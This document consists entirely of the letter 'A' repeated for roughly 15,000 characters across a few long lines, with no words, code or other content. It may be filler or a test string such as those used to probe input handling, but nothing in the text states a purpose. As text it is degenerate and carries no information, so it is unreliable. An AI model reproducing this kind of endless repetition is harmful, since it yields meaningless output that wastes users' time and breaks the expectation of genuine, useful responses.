AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA